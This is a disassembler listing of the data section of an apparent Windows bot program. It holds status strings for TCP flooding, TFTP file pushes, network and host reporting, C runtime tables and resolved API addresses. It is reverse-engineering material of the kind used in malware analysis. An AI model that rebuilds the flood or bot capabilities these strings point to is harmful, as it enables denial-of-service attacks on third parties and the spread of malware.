db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_410E85+192�o
; char aCouldnTResolve[]
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_410E85:loc_410FE9�o
align 4
; char aSS_5[]
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_410E85+EB�o
; char aNetinfoTypeSS_[]
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_411139+AB�o
align 10h
; char off_427E20[]
off_427E20 dd offset loc_412F4E ; DATA XREF: sub_411139:loc_4111AD�o
dword_427E24 dd 4E414Ch ; DATA XREF: sub_411139:loc_4111A6�o
; char aDialUp[]
aDialUp db 'Dial-up',0 ; DATA XREF: sub_411139+5B�o
; char aNotConnected[]
aNotConnected db 'Not connected',0 ; DATA XREF: sub_411139+48�o
align 10h
; char aTcpDoneWithSFl[]
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_4111FF+4EB�o
db 'c (%dMB).',0
align 4
; char aTcpErrorSendin[]
aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_4111FF+44F�o
db 'd: <%d>.',0
align 4
; char aTcpInvalidTarg[]
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_4111FF+15F�o
align 4
; char aTcpErrorSetsoc[]
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_4111FF+EE�o
align 4
; char aTcpErrorSocket[]
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_4111FF+70�o
align 4
dword_427F58 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411743+493�o
aTftpFileTran_1 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_411743+47F�o
align 4
; char aTftpFileNotFou[]
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_411743+3B6�o
align 4
dword_427FB8 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411743+399�o
; char aTftpFileTran_0[]
aTftpFileTran_0 db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_411743+33E�o
align 4
; char aTftpFailedToOp[]
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_411743+15A�o
align 10h
; char aTftpErrorSocke[]
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_411743+6A�o
aOctet db 'octet',0 ; DATA XREF: sub_411743+F�o
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_411CF7+10�o
; char aSNoSThreadFoun[]
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_411EC8+51�o
; char aSSStopped_DThr[]
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_411EC8+35�o
align 10h
dword_4280B0 dd 817CD174h ; DATA XREF: sub_41274C+4�w _rand�r ...
align 10h
dd 9875h, 9873h
off_4280C8 dd offset __fpmath ; DATA XREF: __cinit�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
off_4280E0 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_4280E4 dd 2 ; DATA XREF: __FF_MSGBANNER+E�r
; __NMSG_WRITE+46�r ...
dd 10h
dword_4280EC dd 3F8h ; DATA XREF: __heap_alloc+5�r
; _realloc+4D�r ...
off_4280F0 dd offset aNull ; DATA XREF: __output:loc_414E32�r
; __output+457�r
; "(null)"
off_4280F4 dd offset aNull_0 ; DATA XREF: __output+259�r
; "(null)"
asc_4280F8 db ' ',9,'-',0Dh,']',0 ; DATA XREF: __input:loc_41583F�o
align 10h
asc_428100: ; DATA XREF: __input:loc_41572F�o
unicode 0, <]>,0
off_428104 dd offset __wctype+2 ; DATA XREF: _atol+23�r
; _atol:loc_412B55�r ...
dd offset __wctype+2
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .data:off_428104�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
; size_t SrcSizeInBytes
SrcSizeInBytes dd 1 ; DATA XREF: _atol:loc_412AFC�r
; _atol:loc_412B40�r ...
byte_428314 db 2Eh ; DATA XREF: __input:loc_4155CC�r
; __input+311�r ...
align 4
dd 1
off_42831C dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+F�w
; __output+3AA�r
off_428320 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+5�w
; __output+3E2�r
off_428324 dd offset __fassign ; DATA XREF: __cfltcvt_init+14�w
; __input+430�r
off_428328 dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+1E�w
; __output+3CB�r
off_42832C dd offset __positive ; DATA XREF: __cfltcvt_init+28�w
off_428330 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+32�w
align 8
dword_428338 dd 1 ; DATA XREF: __dosmaperr+C�o
dword_42833C dd 16h ; DATA XREF: __dosmaperr:loc_416989�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
byte_4284A0 db 1 ; DATA XREF: __dosmaperr+19�o
; __setmbcp+E1�r
db 2, 4, 8
align 8
dword_4284A8 dd 3A4h ; DATA XREF: __setmbcp+2F�o
dword_4284AC dd 82798260h ; DATA XREF: __setmbcp+11D�r
dd 21h, 0
dword_4284B8 dd 0DFA6h ; DATA XREF: __setmbcp+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_428598 dd 0C0000005h ; DATA XREF: __setmbcp+3C�o
; _xcptlookup+A�r ...
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_428610 dd 3 ; DATA XREF: __XcptFilter+58�r
dword_428614 dd 7 ; DATA XREF: __XcptFilter+5E�r
dword_428618 dd 0Ah ; DATA XREF: _xcptlookup+4�r
dword_42861C dd 8Ch ; DATA XREF: __XcptFilter+82�r
; __XcptFilter+8F�w ...
dword_428620 dd 0FFFFFFFFh, 0A00h ; DATA XREF: __flsbuf:loc_414A76�o
; __filbuf:loc_41606A�o
dword_428628 dd 19930520h, 3 dup(0) ; DATA XREF: .text:00417D4F�o
; __NLG_Notify+2�o
dword_428638 dd 2 ; DATA XREF: __NMSG_WRITE+E�o
; __NMSG_WRITE+28�r
off_42863C dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41B914h, 9, 41B8E8h, 0Ah, 41B8C4h, 10h, 41B898h
dd 11h, 41B868h, 12h, 41B844h, 13h, 41B818h, 18h, 41B7E0h
dd 19h, 41B7B8h, 1Ah, 41B780h, 1Bh, 41B748h, 1Ch, 41B720h
dd 78h, 41B710h, 79h, 41B700h, 7Ah, 41B6F0h, 0FCh, 41FD9Ch
dd 0FFh, 41B6E0h
dword_4286C8 dd 2 dup(0) ; DATA XREF: __NMSG_WRITE+1B�o
off_4286D0 dd offset dword_475800 ; DATA XREF: ___initstdio+55�o
dd 0
dd offset dword_475800
dd 101h
dword_4286E0 dd 0FFFFFFFFh, 0 ; DATA XREF: ___initstdio+72�o
dd 1000h, 0
dword_4286F0 dd 3 dup(0) ; DATA XREF: __flsbuf+50�o __stbuf+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_428710 dd 3 dup(0) ; DATA XREF: __flsbuf+58�o
; __stbuf:loc_417220�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_428740 dd 84h dup(0) ; DATA XREF: ___initstdio+9B�o
dword_428950 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: ___initstdio+69�o
; sub_4192B5�o
dword_428968 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_4192CB�o
dword_428980 dd 7080h ; DATA XREF: ___loctotime_t+76�r
; __tzset+5E�w ...
dword_428984 dd 1 ; DATA XREF: ___loctotime_t+98�r
; __tzset+8B�w ...
dword_428988 dd 0FFFFF1F0h ; DATA XREF: ___loctotime_t:loc_416B39�r
; __tzset+94�w ...
dword_42898C dd 545350h, 0Fh dup(0) ; DATA XREF: .data:off_428A0C�o
dword_4289CC dd 544450h, 0Fh dup(0) ; DATA XREF: .data:off_428A10�o
; char *off_428A0C
off_428A0C dd offset dword_42898C ; DATA XREF: __tzset+BA�r __tzset+D9�r ...
; char *off_428A10
off_428A10 dd offset dword_4289CC ; DATA XREF: __tzset+F4�r __tzset+11B�r ...
align 8
dword_428A18 dd 0FFFFFFFFh ; DATA XREF: __tzset+1D�w __isindst+1E�r ...
dword_428A1C dd 0 ; DATA XREF: __isindst:loc_41987C�r
; _cvtdate+BF�w
dword_428A20 dd 0 ; DATA XREF: __isindst+192�r
; _cvtdate+E0�w
align 8
dword_428A28 dd 0FFFFFFFFh ; DATA XREF: __tzset+17�w __isindst+26�r ...
dword_428A2C dd 0 ; DATA XREF: __isindst+13A�r
; _cvtdate+EA�w ...
dword_428A30 dd 0 ; DATA XREF: __isindst+1A1�r
; _cvtdate+23�r ...
dword_428A34 dd 0FFFFFFFFh ; DATA XREF: _cvtdate+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_428A64 dd 16Dh ; DATA XREF: ___loctotime_t+2A�r
; _cvtdate+2E�r ...
dword_428A68 dd 0FFFFFFFFh ; DATA XREF: _cvtdate:loc_419980�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_428AA0 dd 2 dup(0) ; DATA XREF: ___multtenpow12+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_428C00 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_428D60 dd 0 ; DATA XREF: sub_401000+9E�o
; char byte_428D64
byte_428D64 db 0 ; DATA XREF: sub_401000+36�r
; sub_4010E3+37�r ...
align 4
dword_428D68 dd 0 ; DATA XREF: sub_40226C+18�r
; sub_4026BF+92�w ...
dword_428D6C dd 0 ; DATA XREF: sub_4027F8+4D�r
; sub_402A0C+D9�w ...
dd 3E6h dup(0)
dword_429D08 dd 6 dup(0) ; DATA XREF: sub_4027F8+CF�o
; sub_4027F8+138�o ...
dword_429D20 dd 0 ; DATA XREF: sub_4022E3+82�w
; sub_4022E3+102�o
dword_429D24 dd 41h dup(0) ; DATA XREF: sub_4022E3+41�o
; char byte_429E28[]
byte_429E28 db 104h dup(0) ; DATA XREF: sub_4022E3+63�o
dword_429F2C dd 0 ; DATA XREF: sub_4022E3+F8�w
; sub_4022E3+114�r
dword_429F30 dd 0 ; DATA XREF: sub_4022E3+52�w
dword_429F34 dd 0 ; DATA XREF: sub_4022E3+4D�w
; sub_4022E3+CF�r
; char byte_429F38[]
byte_429F38 db 80h dup(0) ; DATA XREF: sub_4022E3+9A�o
; sub_4022E3+BA�o
dword_429FB8 dd 0 ; DATA XREF: sub_4022E3+8F�w
dword_429FBC dd 0 ; DATA XREF: sub_4022E3+A7�w
; sub_4022E3+C7�w
dword_429FC0 dd 0 ; DATA XREF: sub_4022E3:loc_40240D�r
align 8
dword_429FC8 dd 0 ; DATA XREF: sub_4022E3+2D5�w
; sub_4022E3+32E�o
; char Dest[]
Dest db 288h dup(0) ; DATA XREF: sub_4022E3+2C3�o
; char byte_42A254[]
byte_42A254 db 104h dup(0) ; DATA XREF: sub_4022E3+28D�o
dword_42A358 dd 0 ; DATA XREF: sub_4022E3+2BA�w
; sub_4022E3+2E1�r
align 10h
dword_42A360 dd 0 ; DATA XREF: sub_4022E3+324�w
; sub_4022E3+340�r
dword_42A364 dd 0 ; DATA XREF: sub_4022E3+2E7�w
dword_42A368 dd 0 ; DATA XREF: sub_4022E3+2F4�w
dword_42A36C dd 0 ; DATA XREF: sub_4022E3+2B4�w
dd 0
dword_42A374 dd 0 ; DATA XREF: sub_4022E3:loc_402639�r
dword_42A378 dd 0 ; DATA XREF: sub_4022E3+1A1�w
; sub_4022E3+221�o
dword_42A37C dd 41h dup(0) ; DATA XREF: sub_4022E3+163�o
; char byte_42A480[]
byte_42A480 db 104h dup(0) ; DATA XREF: sub_4022E3+182�o
dword_42A584 dd 0 ; DATA XREF: sub_4022E3+217�w
; sub_4022E3+233�r
dword_42A588 dd 0 ; DATA XREF: sub_4022E3+171�w
dword_42A58C dd 0 ; DATA XREF: sub_4022E3+1EE�r
; char byte_42A590[]
byte_42A590 db 80h dup(0) ; DATA XREF: sub_4022E3+1B9�o
; sub_4022E3+1D9�o
dword_42A610 dd 0 ; DATA XREF: sub_4022E3+1AE�w
dword_42A614 dd 0 ; DATA XREF: sub_4022E3+1C6�w
; sub_4022E3+1E6�w
dword_42A618 dd 0 ; DATA XREF: sub_4022E3:loc_40252D�r
align 10h
; char byte_42A620[]
byte_42A620 db 4000h dup(0) ; DATA XREF: sub_402D63+1D�o
; sub_402E03�o ...
; char Source[]
Source db 4 dup(0) ; DATA XREF: sub_402D63+13�o
; sub_402E03+E�o ...
dword_42E624 dd 0Eh dup(0) ; DATA XREF: sub_403A49+F�o
dword_42E65C dd 2 dup(0) ; DATA XREF: sub_403DCB+C8�o
dword_42E664 dd 0 ; DATA XREF: sub_40465A+2A�w
; sub_40465A+51�r ...
dword_42E668 dd 0 ; DATA XREF: sub_401A39+AC�r
; sub_404059+72�w ...
align 10h
byte_42E670 db 0 ; DATA XREF: sub_40588C+1D3�w
; sub_40588C+2D2�o
align 2
word_42E672 dw 0 ; DATA XREF: sub_40588C+1E3�w
word_42E674 dw 0 ; DATA XREF: sub_40588C+1E9�w
word_42E676 dw 0 ; DATA XREF: sub_40588C+1F0�w
byte_42E678 db 0 ; DATA XREF: sub_40588C+1F7�w
byte_42E679 db 0 ; DATA XREF: sub_40588C+1FE�w
word_42E67A dw 0 ; DATA XREF: sub_40588C+204�w
dword_42E67C dd 0 ; DATA XREF: sub_40588C+234�w
; sub_40588C+250�w
dword_42E680 dd 0 ; DATA XREF: sub_40588C+258�w
byte_42E684 db 0 ; DATA XREF: sub_40588C+26A�w
byte_42E685 db 0 ; DATA XREF: sub_40588C+27D�w
word_42E686 dw 0 ; DATA XREF: sub_40588C+295�w
word_42E688 dw 0 ; DATA XREF: sub_40588C+2A4�w
word_42E68A dw 0 ; DATA XREF: sub_40588C+29C�w
dword_42E68C dd 101h dup(0) ; DATA XREF: sub_40588C+2B9�o
dword_42EA90 dd 77C72C6Bh ; DATA XREF: sub_405EFF+42F�w
; sub_405EFF+473�r
dword_42EA94 dd 77EBA994h ; DATA XREF: sub_405EFF+65�w
; sub_4088B4+166�r
dword_42EA98 dd 7622A3F4h ; DATA XREF: sub_405EFF+793�w
; sub_405EFF+808�r ...
dword_42EA9C dd 71C45229h ; DATA XREF: sub_405EFF+960�w
; sub_405EFF+9BE�r ...
dword_42EAA0 dd 71C24870h ; DATA XREF: sub_405EFF+912�w
; sub_405EFF+98E�r ...
dword_42EAA4 dd 77C71BB0h ; DATA XREF: sub_405EFF+415�w
; sub_405EFF+463�r
dword_42EAA8 dd 71C4502Ch ; DATA XREF: sub_405EFF+953�w
; sub_405EFF+9B6�r ...
dword_42EAAC dd 77DE801Bh ; DATA XREF: sub_405EFF+2FA�w
; sub_405EFF+34F�r ...
dword_42EAB0 dd 77DDACABh ; DATA XREF: sub_405EFF+397�w
; sub_410E85+11E�r
dword_42EAB4 dd 77DE8075h ; DATA XREF: sub_405EFF+307�w
; sub_405EFF+357�r ...
dword_42EAB8 dd 77DD7496h ; DATA XREF: sub_405EFF+348�w
; sub_407944+AD�r
dword_42EABC dd 71AB1B7Bh ; DATA XREF: sub_404771+115�r
; sub_405EFF+4E2�w ...
dword_42EAC0 dd 77E686CCh ; DATA XREF: sub_403B11+1B�r
; sub_405EFF+72�w ...
dword_42EAC4 dd 71C2498Bh ; DATA XREF: sub_405EFF+905�w
; sub_405EFF+981�r ...
dword_42EAC8 dd 77DDAB2Fh ; DATA XREF: sub_405EFF+32E�w
; sub_405EFF+36F�r ...
dword_42EACC dd 7620E8C3h ; DATA XREF: sub_405EFF+7E1�w
; sub_405EFF+834�r
dword_42EAD0 dd 77DD23D7h ; DATA XREF: sub_405EFF+24B�w
; sub_405EFF+27C�r
dword_42EAD4 dd 76214750h ; DATA XREF: sub_403520+3A�r
; sub_405EFF+7D4�w ...
dword_42EAD8 dd 77E6D75Bh ; DATA XREF: sub_405EFF+B3�w
dword_42EADC dd 7620BD61h ; DATA XREF: sub_403520+109�r
; sub_405EFF+7EE�w ...
dword_42EAE0 dd 71AB60C9h ; DATA XREF: sub_405EFF+4D5�w
; sub_405EFF+658�r ...
dword_42EAE4 dd 77EBA6E9h ; DATA XREF: sub_405EFF+58�w
; sub_405EFF+CA�r ...
dword_42EAE8 dd 76D62A58h ; DATA XREF: sub_405EFF+8BC�w
; sub_4084A7+11A�r
dword_42EAEC dd 76F36EAAh ; DATA XREF: sub_405EFF+A0C�w
; sub_405EFF+A13�r ...
dword_42EAF0 dd 77E802FCh ; DATA XREF: sub_405EFF+A6�w
; sub_405EFF+F2�r
dword_42EAF4 dd 77C75455h ; DATA XREF: sub_405EFF+408�w
; sub_405EFF+45B�r
dword_42EAF8 dd 71AB12A7h ; DATA XREF: sub_402677+20�r
; sub_405EFF+57E�w ...
dword_42EAFC dd 71C574FAh ; DATA XREF: sub_405EFF+946�w
; sub_405EFF+9AE�r
dword_42EB00 dd 71AB1746h ; DATA XREF: sub_405EFF+571�w
; sub_405EFF+6DC�r
dword_42EB04 dd 71B28D0Dh ; DATA XREF: sub_4010E3+9A�r
; sub_405EFF+AC7�w
dword_42EB08 dd 762211EFh ; DATA XREF: sub_405EFF+786�w
; sub_405EFF+7F5�r ...
dword_42EB0C dd 77D902E3h ; DATA XREF: sub_405EFF+1B3�w
; sub_407228+15�r
dword_42EB10 dd 71C2FA86h ; DATA XREF: sub_405EFF+91F�w
; sub_405EFF+996�r ...
dword_42EB14 dd 77DE1291h ; DATA XREF: sub_405EFF+314�w
; sub_405EFF+35F�r ...
dword_42EB18 dd 77E2C1B3h ; DATA XREF: sub_405EFF+321�w
; sub_405EFF+367�r ...
dword_42EB1C dd 71ABF628h ; DATA XREF: sub_405EFF+634�w
; sub_40F1B7+D0�r
dword_42EB20 dd 71AB1836h ; DATA XREF: sub_40318B:loc_4034B6�r
; sub_403520+46C�r ...
dword_42EB24 dd 77C72889h ; DATA XREF: sub_405EFF+43C�w
dword_42EB28 dd 71C453F8h ; DATA XREF: sub_405EFF+96D�w
; sub_405EFF+9C6�r ...
dword_42EB2C dd 77DD5C55h ; DATA XREF: sub_402FA4+51�r
; sub_405EFF+258�w ...
dword_42EB30 dd 77E96645h ; DATA XREF: sub_403D46+25�r
; sub_403D46+39�r ...
dword_42EB34 dd 77428B97h ; DATA XREF: sub_403520+33C�r
; sub_405EFF+B14�w ...
dword_42EB38 dd 71AB41DAh ; DATA XREF: sub_40318B+2F�r
; sub_40576B+17�r ...
dword_42EB3C dd 762059A3h ; DATA XREF: sub_405EFF+7AD�w
; sub_405EFF+818�r
dword_42EB40 dd 71C4A1B4h ; DATA XREF: sub_405EFF+92C�w
; sub_405EFF+99E�r
dword_42EB44 dd 1F7CD214h ; DATA XREF: sub_405EFF+B85�w
; sub_405EFF+BB6�r
dword_42EB48 dd 76D629BBh ; DATA XREF: sub_405EFF+8A2�w
; sub_405EFF+8B6�r ...
dword_42EB4C dd 1F7B9D96h ; DATA XREF: sub_405EFF+B9F�w
dword_42EB50 dd 71AB1740h ; DATA XREF: sub_40318B:loc_403480�r
; sub_404771:loc_404B5C�r ...
dword_42EB54 dd 7620AFB6h ; DATA XREF: sub_405EFF+7C7�w
; sub_405EFF+7FB�r
dword_42EB58 dd 77D45B19h ; DATA XREF: sub_405EFF+172�w
; sub_405EFF+1C2�r
dword_42EB5C dd 71AB157Eh ; DATA XREF: sub_405EFF+600�w
; sub_405EFF+72C�r ...
dword_42EB60 dd 71AB3E5Dh ; DATA XREF: sub_4013EE+20A�r
; .text:00401906�r ...
dword_42EB64 dd 71AB14DCh ; DATA XREF: sub_405EFF+4EF�w
; sub_405EFF+664�r
dword_42EB68 dd 0CC0004h ; DATA XREF: sub_403520+34�r
; sub_405EFF+863�w ...
dword_42EB6C dd 77DD590Bh ; DATA XREF: sub_402FA4+26�r
; sub_405EFF+231�w ...
dword_42EB70 dd 71ABD755h ; DATA XREF: sub_405EFF+627�w
; sub_405EFF+744�r ...
dword_42EB74 dd 77DF7311h ; DATA XREF: sub_405EFF+2B5�w
; sub_405EFF+2C9�r ...
dword_42EB78 dd 77DDA2AFh ; DATA XREF: sub_405EFF+33B�w
; sub_405EFF+377�r ...
dword_42EB7C dd 1F7CD927h ; DATA XREF: sub_405EFF+B78�w
; sub_405EFF+BAE�r
dword_42EB80 dd 76206853h ; DATA XREF: sub_405EFF+7A0�w
; sub_405EFF+810�r
dword_42EB84 dd 77D5E310h ; DATA XREF: sub_405EFF+18C�w
; sub_405EFF+1D2�r ...
dword_42EB88 dd 76206B7Fh ; DATA XREF: sub_405EFF+7BA�w
; sub_405EFF+820�r
dword_42EB8C dd 71AB1444h ; DATA XREF: sub_405EFF+5AC�w
; sub_405EFF+6FC�r ...
dword_42EB90 dd 77DD189Ah ; DATA XREF: sub_402FA4+5A�r
; sub_405EFF+265�w
dword_42EB94 dd 71AB3F8Dh ; DATA XREF: sub_40318B+6F�r
; sub_40588C+AA�r ...
dword_42EB98 dd 77DD5D20h ; DATA XREF: sub_405EFF+2A8�w
; sub_405EFF+2BC�r ...
dword_42EB9C dd 71AB1890h ; DATA XREF: sub_40275B+82�r
; sub_404771+F9�r ...
dword_42EBA0 dd 77C76B34h ; DATA XREF: sub_405EFF+3D4�w
; sub_405EFF+436�r
dword_42EBA4 dd 77D5E38Ch ; DATA XREF: sub_405EFF+199�w
; sub_405EFF+1DA�r ...
dword_42EBA8 dd 77DDA20Bh ; DATA XREF: sub_405EFF+2ED�w
; sub_405EFF+342�r ...
dword_42EBAC dd 76F36EEBh ; DATA XREF: sub_405EFF+A19�w
dword_42EBB0 dd 71AB12A7h ; DATA XREF: sub_402677+2B�r
; sub_40318B+EB�r ...
dword_42EBB4 dd 71AB1746h ; DATA XREF: sub_4013EE+1BA�r
; .text:004017EE�r ...
dword_42EBB8 dd 77EBA595h ; DATA XREF: sub_405EFF+4B�w
; sub_405EFF+C2�r ...
dword_42EBBC dd 77C7531Dh ; DATA XREF: sub_405EFF+3FB�w
; sub_405EFF+453�r
dword_42EBC0 dd 77D4BDCAh ; DATA XREF: sub_405EFF+165�w
; sub_405EFF+1BA�r ...
dword_42EBC4 dd 71C3516Ah ; DATA XREF: sub_405EFF+987�w
; sub_40822D+72�r
dword_42EBC8 dd 71AB32CAh ; DATA XREF: sub_405EFF+60D�w
; sub_405EFF+734�r
dword_42EBCC dd 71AB5690h ; DATA XREF: sub_4013EE+23B�r
; sub_4013EE+263�r ...
dword_42EBD0 dd 1F7CB8F8h ; DATA XREF: sub_405EFF+B92�w
; sub_405EFF+BBE�r
dword_42EBD4 dd 77EBB1E7h ; DATA XREF: sub_405EFF+3E�w
; sub_405EFF+BA�r ...
dword_42EBD8 dd 77DD59F0h ; DATA XREF: sub_402FA4+45�r
; sub_405EFF+23E�w ...
dword_42EBDC dd 71AB5DE2h ; DATA XREF: sub_404771+9E�r
; sub_405C73+74�r ...
dword_42EBE0 dd 71AB3ECEh ; DATA XREF: sub_404771+89�r
; sub_405C73+62�r ...
dword_42EBE4 dd 76204E4Dh ; DATA XREF: sub_403520+4DC�r
; sub_405EFF+801�w
dword_42EBE8 dd 0 ; DATA XREF: sub_405EFF+112�w
dword_42EBEC dd 1F7D886Ah ; DATA XREF: sub_405EFF+B5E�w
; sub_405EFF+B99�r
dword_42EBF0 dd 71AB12F8h ; DATA XREF: sub_4013EE+1C8�r
; .text:004017FC�r ...
dword_42EBF4 dd 77C76551h ; DATA XREF: sub_405EFF+3E1�w
; sub_405EFF+443�r
dword_42EBF8 dd 77C729E2h ; DATA XREF: sub_405EFF+422�w
; sub_405EFF+46B�r
dword_42EBFC dd 77C7212Fh ; DATA XREF: sub_405EFF+3EE�w
; sub_405EFF+44B�r
dword_42EC00 dd 71AB1AF4h ; DATA XREF: sub_4013EE+221�r
; sub_4013EE+249�r ...
dword_42EC04 dd 77D5E303h ; DATA XREF: sub_405EFF+1A6�w
; sub_405EFF+1E2�r ...
